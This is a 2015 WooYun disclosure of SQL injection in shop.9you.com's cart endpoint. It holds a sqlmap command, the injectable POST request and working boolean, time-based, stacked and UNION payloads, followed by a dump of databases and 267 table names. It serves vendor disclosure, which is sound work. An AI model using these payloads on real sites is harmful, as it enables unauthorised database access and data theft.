当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163127

漏洞标题:久游网某站SQL注入

相关厂商:久游网

漏洞作者: 小川

提交时间:2015-12-21 12:32

修复时间:2016-02-01 10:51

公开时间:2016-02-01 10:51

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-21: 细节已通知厂商并且等待厂商处理中
2015-12-21: 厂商已经确认,细节仅向厂商公开
2015-12-31: 细节向核心白帽子及相关领域专家公开
2016-01-10: 细节向普通白帽子公开
2016-01-20: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

什么样的节奏是最呀最摇摆?什么样的歌声才是最开怀?

详细说明:

ragecomic.png

漏洞证明:

cookie我删掉了,测试验证的时候可以先登录,然后把cookie辅助到这个请求里,然后再用sqlmap去跑sqlmap.py -r 1.txt --dbs --dbms=mysql --string="ouak6v3z1447067466"

POST http://shop.9you.com/cart/info HTTP/1.1
Host: shop.9you.com
Connection: keep-alive
Content-Length: 46
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://shop.9you.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://shop.9you.com/cart/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie:
cart_type=mb&item_key[]=ouak6v3z1447067466*
sqlmap identified the following injection points with a total of 41 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') AND 4709=4709 AND ('tWvx'='tWvx
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: cart_type=mb&item_key[]=ouak6v3z1447067466');(SELECT * FROM (SELECT(SLEEP(5)))QGkB)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') AND (SELECT * FROM (SELECT(SLEEP(5)))GlAU) AND ('xGKb'='xGKb
Type: UNION query
Title: Generic UNION query (NULL) - 23 columns
Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') UNION ALL SELECT NULL,CONCAT(0x716b766a71,0x426970725a4f4a46434a,0x71707a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') AND 4709=4709 AND ('tWvx'='tWvx
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: cart_type=mb&item_key[]=ouak6v3z1447067466');(SELECT * FROM (SELECT(SLEEP(5)))QGkB)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') AND (SELECT * FROM (SELECT(SLEEP(5)))GlAU) AND ('xGKb'='xGKb
Type: UNION query
Title: Generic UNION query (NULL) - 23 columns
Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') UNION ALL SELECT NULL,CONCAT(0x716b766a71,0x426970725a4f4a46434a,0x71707a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL >= 5.0.0
available databases [4]:
[*] aushop
[*] information_schema
[*] mysql
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') AND 4709=4709 AND ('tWvx'='tWvx
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: cart_type=mb&item_key[]=ouak6v3z1447067466');(SELECT * FROM (SELECT(SLEEP(5)))QGkB)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') AND (SELECT * FROM (SELECT(SLEEP(5)))GlAU) AND ('xGKb'='xGKb
Type: UNION query
Title: Generic UNION query (NULL) - 23 columns
Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') UNION ALL SELECT NULL,CONCAT(0x716b766a71,0x426970725a4f4a46434a,0x71707a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL >= 5.0.0
available databases [4]:
[*] aushop
[*] information_schema
[*] mysql
[*] test
Database: aushop
[267 tables]
+----------------------------+
| 120112happy_lovers |
| 130619_wxbind_award_log |
| 130929_wabp_log |
| 131220_baoming_fam_data |
| 131220_baoming |
| 140327_vip_lb_badge |
| 140327_vip_lb_log |
| 140327_vip_lb |
| 140404_labachongji_log |
| 140520_mtlb_log |
| 140710_yidong_log |
| 140710_yidong |
| 140715_wabp_freeback_log |
| 20141220_repay_log |
| 20141220_repay |
| 20141220_vip_badge |
| 20141220_vip_item_log |
| 20150720_mtlb_log |
| 20151204_mtlb_log |
| 4familybgan |
| 4familycard |
| 4familylist |
| 4familylog |
| 4familypet |
| 4familypets |
| 4familytemp |
| 4familytguo |
| 4familyuser |
| 4magicexp |
| 4magiclove_log |
| 4magiclovestar |
| 4magicpets |
| 4magicuserinfo |
| active4_gift |
| active_02_get_log |
| active_02_log |
| active_02_pay_log |
| active_04_get_log |
| active_04_log |
| active_04_pay_log |
| active_05_get_log |
| active_05_log |
| active_05_pay_log |
| active_06_get_log |
| active_06_log |
| active_06_pay_log |
| active_07_get_log |
| active_07_log |
| active_07_pay_log |
| active_08_get_log |
| active_08_log |
| active_08_pay_log |
| active_10_get_log |
| active_10_log |
| active_10_pay_log |
| active_11_get_log |
| active_11_log |
| active_11_pay_log |
| active_15_get_log |
| active_15_log |
| active_15_pay_log |
| active_badge |
| active_badge_201503 |
| active_badge_615 |
| active_badge_july |
| active_badge_june |
| active_badge_yy |
| active_charts_07_get_log |
| active_charts_07_log |
| active_charts_07_pay_log |
| active_common |
| active_common_201412 |
| active_common_log |
| active_common_log_201412 |
| active_get_log |
| active_info |
| active_item |
| active_list |
| active_log |
| active_ol_get_log |
| active_ol_log |
| active_ol_pay_log |
| active_online |
| active_online_201503 |
| active_online_badge |
| active_online_badge_201503 |
| active_online_special |
| active_online_token |
| active_online_token2 |
| active_online_token3 |
| active_pay_log |
| active_rank |
| active_ranklist |
| active_wshg_20150228 |
| active_ylh_get_log |
| active_ylh_log |
| active_ylh_pay_log |
| active_ylh_vip |
| admin_log |
| admin_user |
| advert |
| appointments |
| au_anniversary |
| au_tenyear_addflower |
| au_tenyear_cdkey |
| au_tenyear_draw |
| au_tenyear_log |
| au_tenyear_sign |
| badge_buylog |
| badge_card |
| badge_card_log |
| badge_help_t |
| badge_info |
| badge_info_log |
| badge_info_log_back |
| badge_money |
| badge_ranking_list |
| badge_ranking_log |
| badgetlog |
| badgetlog_err |
| bc_common_log |
| buylogs |
| buylogs_luck |
| buylogs_temp |
| buylogs_temp2 |
| buylogs_tqlb |
| cart_give_info |
| cart_info |
| carts |
| carts_give |
| carts_mini |
| check_mysql_status |
| combine |
| combine_4647_bak |
| coupon |
| cp44trade |
| ddung_collect |
| discount_tickets |
| discount_uselog |
| family_party_t |
| faminfo |
| famitem_buylog |
| fampet_buylog |
| famrename |
| famrenameinfo |
| feiniu_coupon |
| fengting |
| freebuylog |
| freebuylog_20150310 |
| freebuylog_refund |
| freebuylog_refund_log |
| get_active_common |
| gift_get_item |
| gift_log |
| gift_log2013 |
| gift_log2014 |
| gift_log2015 |
| gift_log_2015 |
| gift_log_2016 |
| gift_mb |
| gift_mb_2011 |
| gift_mb_2012 |
| gift_mb_2013 |
| gift_mb_2013_2 |
| gift_mb_2014 |
| gift_mb_2015 |
| gift_mb_201503 |
| gift_mb_log |
| gift_mb_log_2011_12 |
| gift_mb_log_2013 |
| gift_mb_log_2014 |
| gift_shop |
| gift_shop_2011 |
| gift_shop_2012 |
| gift_shop_2013 |
| gift_shop_2013_1 |
| gift_shop_2014 |
| gift_shop_2015 |
| gift_shop_2016 |
| gift_test_shop |
| gift_test_shop_2012 |
| gift_test_shop_2013_1 |
| gift_test_shop_2013_2 |
| gift_test_shop_2013_3 |
| gift_test_shop_2014_1 |
| gift_test_shop_2014_2 |
| gift_test_shop_2014_6 |
| hiddenword |
| hope_data |
| horn_kb |
| horn_kb_err |
| horn_money |
| horn_money_errlog |
| horn_pool |
| horn_pool_errlog |
| horn_rank |
| horn_rank_log |
| horn_rank_log_v2 |
| imageshow_t |
| items |
| items_online |
| items_online_july |
| items_online_june |
| items_online_may |
| labck_roster |
| labck_vote |
| lastlogin_allzone_good |
| lottery |
| lottery_award |
| lottery_get_log |
| lovedata_blacklist |
| loverheartlog |
| luckydraw_0401_contact |
| luckydraw_0401_user_t |
| magic_buylog |
| member_badge |
| mtlb_card_list |
| mtlb_item_list |
| nickname_card |
| nickname_log |
| old_temp_candies |
| old_temp_common |
| old_temp_common_log |
| online_blacklist |
| order_detail |
| order_online |
| orders |
| rank_blacklist |
| rank_game_horn_list |
| rank_guild_temp |
| ranking_list |
| return_20150720 |
| ring_info |
| rush_buy_info |
| rush_buy_items |
| rush_gift_get_log |
| rush_gift_pay_log |
| shop_marquee |
| skin_log |
| skin_t |
| slave_check |
| temp_candies |
| temp_common |
| temp_common_log |
| tenyear_ring |
| tk_order_detail |
| tk_orders |
| top_buylog |
| user_band_server |
| user_fx_protect |
| user_fx_protect_log |
| user_lottery |
| user_lottery_log |
| vip_badge_active |
| vip_badge_active_log |
| vip_card |
| vip_item_log |
| vote_card |
| vote_card_log |
| wabp_buylog |
| ylh_common_log |
| yy_login |
| yy_login_log |
| yy_order |
| yy_user |
| yzbp_roster |
| yzbp_vote |
+----------------------------+

修复方案:

过滤

版权声明:转载请注明来源 小川@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-12-21 16:42

厂商回复:

非常感谢。

最新状态:

暂无